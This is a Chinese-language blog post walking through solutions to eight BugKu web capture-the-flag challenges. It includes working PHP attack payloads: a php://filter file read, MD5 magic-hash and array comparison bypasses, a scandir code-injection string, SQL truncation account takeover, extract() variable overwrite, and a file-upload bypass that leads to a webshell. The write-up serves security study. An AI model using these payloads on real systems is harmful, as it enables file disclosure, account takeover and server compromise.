<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="Web 14http:&#x2F;&#x2F;114.67.246.176:11964&#x2F;index.php?file&#x3D;show.php 这是页面的url，我们就可以知道可以通过index.php文件通过$_GET来读取其他文件，根据题目可知flag在index.php中，但是无法直接读取，可以用base64的方法读取，构造url php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;reso">
<meta property="og:type" content="article">
<meta property="og:title" content="BugKu-WEB">
<meta property="og:url" content="http://example.com/2021/02/01/article-title-24/index.html">
<meta property="og:site_name" content="Yanghaoxuan&#39;sBlog">
<meta property="og:description" content="Web 14http:&#x2F;&#x2F;114.67.246.176:11964&#x2F;index.php?file&#x3D;show.php 这是页面的url，我们就可以知道可以通过index.php文件通过$_GET来读取其他文件，根据题目可知flag在index.php中，但是无法直接读取，可以用base64的方法读取，构造url php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;reso">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-02-01T07:14:10.000Z">
<meta property="article:modified_time" content="2021-03-21T08:13:49.630Z">
<meta property="article:author" content="Yanghaoxuan">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2021/02/01/article-title-24/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>BugKu-WEB | Yanghaoxuan'sBlog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Yanghaoxuan'sBlog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/02/01/article-title-24/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Yanghaoxuan">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Yanghaoxuan'sBlog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          BugKu-WEB
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-02-01 15:14:10" itemprop="dateCreated datePublished" datetime="2021-02-01T15:14:10+08:00">2021-02-01</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-03-21 16:13:49" itemprop="dateModified" datetime="2021-03-21T16:13:49+08:00">2021-03-21</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h5 id="Web-14"><a href="#Web-14" class="headerlink" title="Web 14"></a>Web 14</h5><p><code>http://114.67.246.176:11964/index.php?file=show.php</code> 这是页面的url，我们就可以知道可以通过index.php文件通过$_GET来读取其他文件，根据题目可知flag在index.php中，但是无法直接读取，可以用base64的方法读取，构造url</p>
<p><code>php://filter/read=convert.base64-encode/resource=index.php</code></p>
<p><code>php://</code>是一种协议名称，<code>php://filter/</code>是一种访问本地文件的协议，<code>/read=convert.base64-encode/</code>表示读取的方式是base64编码后， <code>resource=index.php</code>表示目标文件为<code>index.php</code>。</p>
<p>访问后得到的代码再经过base64的解码，就可以成功拿到flag。</p>
<h5 id="Web-16"><a href="#Web-16" class="headerlink" title="Web 16"></a>Web 16</h5><p>根据题目知道要找备份文件，看完别人的解法知道要用到御剑这个软件扫描备份文件，成功扫出然后下载了一个<code>index.php.bak</code>的文件，其中有两端代码是比较关键的</p>
<p>1.<code>$str = str_replace(&#39;key&#39;,&#39;&#39;,$str);</code> 将key替换，所以等等需要使用双写</p>
<p>2.<code>if(md5($key1) == md5($key2) &amp;&amp; $key1 !== $key2)&#123;</code><br>    <code>echo $flag.&quot;取得flag&quot;;</code><br><code>&#125;</code>  需要使md5加密过后的key1值与key2值相同，但是两者原本的值不能相同，这涉及到了MD5的绕过</p>
<p>md5加密之后以0e开头的，值都为0，那是因为0e在比较的时候会将其视作为科学计数法，所以无论0e后面是什么，0的多少次方还是0。</p>
<p>常见的<code>0e</code>开头：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">QNKCDZO</span><br><span class="line"><span class="number">0e830400451993494058024219903391</span></span><br><span class="line"> </span><br><span class="line">s878926199a</span><br><span class="line"><span class="number">0e545993274517709034328855841020</span></span><br><span class="line">  </span><br><span class="line">s155964671a</span><br><span class="line"><span class="number">0e342768416822451524974117254469</span></span><br><span class="line">  </span><br><span class="line">s214587387a</span><br><span class="line"><span class="number">0e848240448830537924465865611904</span></span><br><span class="line">  </span><br><span class="line">s214587387a</span><br><span class="line"><span class="number">0e848240448830537924465865611904</span></span><br><span class="line">  </span><br><span class="line">s878926199a</span><br><span class="line"><span class="number">0e545993274517709034328855841020</span></span><br><span class="line">  </span><br><span class="line">s1091221200a</span><br><span class="line"><span class="number">0e940624217856561557816327384675</span></span><br></pre></td></tr></table></figure>

<p>可以将这些值赋予key1,2  例如<code>?kekeyy1=s878926199a&amp;kekeyy2=s214587387a</code>或者<code>?kekeyy1=QNKCDZO&amp;kekeyy2=s214587387a</code>（这里用到了双写），这样就可以得到flag。</p>
<p>还有另一种解法，md5()函数无法处理数组，如果传入的为数组，会返回NULL，所以两个数组经过加密后得到的都是NULL,也就是相等的，也就是构造下列的payload：<code>?kekeyy1[]=aa&amp;kekeyy2[]=bb</code>，同样能得到flag。</p>
<h5 id="Web-22"><a href="#Web-22" class="headerlink" title="Web 22"></a>Web 22</h5><p>本关要用到php scandir()函数</p>
<p>print_r()函数用于打印变量</p>
<p>scandir()函数的作用是扫描文件夹下的目录和文件，返回值为所有文件名组成的一个数组</p>
<p>我们需要读取当前目录，根据代码提示可以构建一个payload：<code>?s=print_r(scandir(&#39;./&#39;))</code>。（<code>./</code>是当前目录，如果想读取父级目录可以改为<code>../</code>）</p>
<p>之后就可以得到一个.txt的文件，打开便能拿到flag。</p>
<h5 id="Web-25-SQL约束攻击"><a href="#Web-25-SQL约束攻击" class="headerlink" title="Web 25 SQL约束攻击"></a>Web 25 SQL约束攻击</h5><p>SQL约束攻击的原理就是利用的约束条件，比如最长只能有15个字符的话，如果你输入的是abcdefghijklmnop(16位），那么保存在数据库里的就是abcdefghijklmno，那么别人用abcdefghijklmno注册一个用户名，就可以登陆。</p>
<p>还有一个可以利用的地方就是SQL在执行字符串处理的时候是会自动修剪掉尾部的空白符的，也就是说”abc”==”abc “，同样我们可以通过注册用户名为”abc “的账号来登陆”abc”的账号。</p>
<p>题目中说的是约束攻击那就试着用”admin “（注意有个空格）注册了一个账号，用这个的密码登陆”admin”账号，然后就看到了flag。</p>
<h5 id="Web-27"><a href="#Web-27" class="headerlink" title="Web 27"></a>Web 27</h5><p>根据题目提示得知这题是md5碰撞，看源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">$md51 &#x3D; md5(&#39;QNKCDZO&#39;);</span><br><span class="line">$a &#x3D; @$_GET[&#39;a&#39;];</span><br><span class="line">$md52 &#x3D; @md5($a);</span><br><span class="line">if(isset($a))&#123;</span><br><span class="line">    if ($a !&#x3D; &#39;QNKCDZO&#39; &amp;&amp; $md51 &#x3D;&#x3D; $md52) &#123;</span><br><span class="line">        echo &quot;nctf&#123;*****************&#125;&quot;;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        echo &quot;false!!!&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">    echo &quot;please input a&quot;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>需要用get型得到一个a的值，a不能与QNKCDZO相同，并且QNKCDZO经过md5加密过的值要与a加密过的值相等</p>
<p>拓展：一个数字和一个字符串进行比较，PHP会把字符串转换成数字再进行比较。PHP转换的规则的是：若字符串以数字开头，则取开头数字作为转换结果，若无则输出0。例如：123abc转换后应该是123，而abc则为0，0==0这当然是成立的啦！所以，0 ==’abc’是成立的。当有一个对比参数是整数的时候，会把另外一个参数强制转换为整数。</p>
<p>所以只需找一个md5加密后开头为0e的值赋给a即可 payload：<a target="_blank" rel="noopener" href="http://114.67.246.176:17240/?a=240610708">http://114.67.246.176:17240/?a=240610708</a></p>
<h5 id="Web-30"><a href="#Web-30" class="headerlink" title="Web 30"></a>Web 30</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">extract($_GET);</span><br><span class="line">if (!empty($ac))</span><br><span class="line">&#123;</span><br><span class="line">$f &#x3D; trim(file_get_contents($fn));</span><br><span class="line">if ($ac &#x3D;&#x3D;&#x3D; $f)</span><br><span class="line">&#123;</span><br><span class="line">echo &quot;&lt;p&gt;This is flag:&quot; .&quot; $flag&lt;&#x2F;p&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">echo &quot;&lt;p&gt;sorry!&lt;&#x2F;p&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>根据题目提示有一个txt文件，直接猜是<code>flag.txt</code>,确实可以访问到这个文件，文件内容是<code>bugku</code>，</p>
<p>trim()去除字符串首尾处的空白字符，file_get_contents()将整个文件读入一个字符串，所以<code>bugku</code>被赋给了变量<code>f</code>，看判断语句可知，只需变量ac与f相等就可以拿到flag，构建payload:?fn=flag.txt&amp;ac=bugku。</p>
<h5 id="Web-32"><a href="#Web-32" class="headerlink" title="Web 32"></a>Web 32</h5><p>没有源码可看，题目提示是文件上传 ，第一时间想到的是后缀修改，看了wp才发现还要修改content-type，利用burp suite改包，用文件类型的大小写来绕过，并尝试修改后缀，发现php4没被滤过，发包之后再用菜刀查根目录就可以拿到根目录</p>
<h5 id="Web-35"><a href="#Web-35" class="headerlink" title="Web 35"></a>Web 35</h5><p>看网页的源码可以发现一个admin.css的文件，打开后发现第一行代码写到<code>/* try  ?xxxx */</code>(xxxx是随机的数字，例如我的是10509)，构建payload:<code>http://114.67.246.176:15333/?10509</code>,打开后得到的php代码如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">$KEY&#x3D;&#39;ctf.bugku.com&#39;;</span><br><span class="line">include_once(&quot;flag.php&quot;);</span><br><span class="line">$cookie &#x3D; $_COOKIE[&#39;BUGKU&#39;];</span><br><span class="line">if(isset($_GET[&#39;10509&#39;]))&#123;</span><br><span class="line">    show_source(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">elseif (unserialize($cookie) &#x3D;&#x3D;&#x3D; &quot;$KEY&quot;)</span><br><span class="line">&#123;   </span><br><span class="line">    echo &quot;$flag&quot;;</span><br><span class="line">&#125;</span><br><span class="line">else &#123;</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p>需要补充的cookie信息是BUGKU，if判断语句需要用unserialize()函数处理过的BUGKU与key相同</p>
<p>编写php代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">  $KEY&#x3D;&#39;ctf.bugku.com&#39;;</span><br><span class="line">  echo serialize($KEY);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>运行之后可以得到cookie值：<code>BUGKU=s:13:&quot;ctf.bugku.com&quot;;</code>,再用hackbar上传即可。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/01/29/article-title-23/" rel="prev" title="upload-labs pass17">
      <i class="fa fa-chevron-left"></i> upload-labs pass17
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/03/26/article-title-25/" rel="next" title="i春秋">
      i春秋 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-5"><a class="nav-link" href="#Web-14"><span class="nav-number">1.</span> <span class="nav-text">Web 14</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Web-16"><span class="nav-number">2.</span> <span class="nav-text">Web 16</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Web-22"><span class="nav-number">3.</span> <span class="nav-text">Web 22</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Web-25-SQL%E7%BA%A6%E6%9D%9F%E6%94%BB%E5%87%BB"><span class="nav-number">4.</span> <span class="nav-text">Web 25 SQL约束攻击</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Web-27"><span class="nav-number">5.</span> <span class="nav-text">Web 27</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Web-30"><span class="nav-number">6.</span> <span class="nav-text">Web 30</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Web-32"><span class="nav-number">7.</span> <span class="nav-text">Web 32</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Web-35"><span class="nav-number">8.</span> <span class="nav-text">Web 35</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Yanghaoxuan</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">31</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yanghaoxuan</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
